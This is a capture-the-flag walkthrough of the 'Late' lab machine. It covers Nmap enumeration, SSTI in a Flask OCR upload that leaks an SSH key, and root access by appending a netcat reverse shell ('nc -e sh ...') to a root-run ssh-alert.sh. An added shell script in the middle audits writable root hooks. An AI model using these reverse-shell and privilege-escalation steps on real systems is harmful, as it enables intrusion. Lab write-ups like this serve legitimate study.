Let's start enumeration with Nmap:
nmap -sS -A -sC -sV -T5 -oN scan.txt 10.129.132.140
Nmap scan report for 10.129.132.140
Host is up (0.082s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
| 256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_ 256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 3306/tcp)
HOP RTT ADDRESS
1 83.66 ms 10.10.14.1
2 83.65 ms 10.129.132.140
Ports 22 and 80 are open, and HTTP is served on port 80.
Let's visit it in our browser.
Port 80
Looking at the website, there isn't much here.
I found one link in the source code.
To visit that page, we have to add images.late.htb to our hosts file.
After editing /etc/hosts and adding the machine's IP, we are good to go.
images.late.htb
This page converts any image to text, like OCR. So let's upload an image and check the response.
The output 👇
<p>If you want to turn an image into a text document, you came to the right place.
</p>
Here we can see that it has extracted the text from the image.
This image-to-text only detects some fonts. I am currently using MS Word, font Bahnschrift, landscape; if this does not work, try changing the font and size.
Here we can see that the heading says "flask" (information disclosure). From my previous experience, most Flask-based applications are vulnerable to SSTI.
Let's try uploading an image containing the SSTI payload {{7*7}} and check the response.
Now, copy the above private key to our machine, removing the <p> and </p> tags.
chmod 600 id_rsa
ssh svc_acc@$ip -i id_rsa
We are in!
Privilege Escalation
scp -i id_rsa linpeas.sh svc_acc@$ip:.
Let's run linpeas.sh:
chmod +x linpeas.sh
./linpeas.sh
We got some interesting files with root privileges in /usr/local/sbin.
Let's check ssh-alert.sh.
Looks like this runs whenever a user connects over SSH.
So we can modify this file and get the root flag. Let's confirm who runs it with pspy:
pspy64
Now re-login in another terminal with SSH. Here we can see that ssh-alert.sh is running with UID=0, which means it is running with root permissions.
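The root cause here is a root-executed hook that an unprivileged account can still change. The script below is an added audit helper, not part of the original writeup: it lists files under a directory (default /usr/local/sbin) that group or others can write to, and, where lsattr is available, files carrying the ext append-only attribute ('a'). That attribute is what makes overwriting with > fail while >> still succeeds, which matches the symptom described for ssh-alert.sh; the page itself only reports the symptom, so treating it as the cause is my assumption. The function name is mine.

```shell
#!/bin/sh
# Added audit helper, not from the original writeup.
# Reports files under a directory that a non-root account could tamper with
# before a root-run hook (such as ssh-alert.sh) executes them.
# Assumes a POSIX sh with find and ls; lsattr (e2fsprogs) is optional.

audit_root_scripts() {
    dir="${1:-/usr/local/sbin}"

    # 1. Files writable by group (0020) or others (0002): anyone in that group,
    #    or anyone at all, can replace the script body that root later runs.
    find "$dir" -type f \( -perm -0002 -o -perm -0020 \) -print 2>/dev/null |
    while IFS= read -r f; do
        printf 'WRITABLE: %s\n' "$(ls -ld "$f")"
    done

    # 2. Files with the ext append-only attribute ('a' in lsattr output):
    #    '>' is refused but '>>' works, so lines can still be added at the end.
    #    lsattr fails on non-ext filesystems; that noise is discarded.
    if command -v lsattr >/dev/null 2>&1; then
        lsattr -d "$dir"/* 2>/dev/null | while IFS= read -r line; do
            attrs=${line%% *}
            case "$attrs" in
                *a*) printf 'APPEND-ONLY: %s\n' "$line" ;;
            esac
        done
    fi
}

# Stand-alone use: ./audit.sh [directory]
audit_root_scripts "$@"
```

Run it as the low-privileged user on a box you administer: anything it prints under a directory that root-run hooks live in is a finding, and the fix is chmod 755 (or tighter), root ownership, and removing the 'a' attribute with chattr -a unless appending is genuinely required.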
We can get the root flag in two ways.
Method 1 - With rev shell
Let's check whether nc is present on the machine.
Okay, we have nc. We can just append to ssh-alert.sh to get a reverse shell.
We cannot edit ssh-alert.sh as we don't have permission to overwrite it, so we can only append to the file using >>:
echo -n 'nc -e sh {ip} 9004' >> /usr/local/sbin/ssh-alert.sh
Now, set up a listener in another terminal: nc -lnvp 9004
Re-login over SSH as svc_acc to trigger the script.
Boom! Now we have a reverse shell on our listener, and we are root!
Method 2 - Copying root.txt to our unprivileged user
We can just use cat to read root.txt and append it to a file owned by svc_acc, without any reverse shell.
1. Create a flag.txt file under /home/svc_acc/
touch /home/svc_acc/flag.txt
2. Append a cat command that reads /root/root.txt into that file to ssh-alert.sh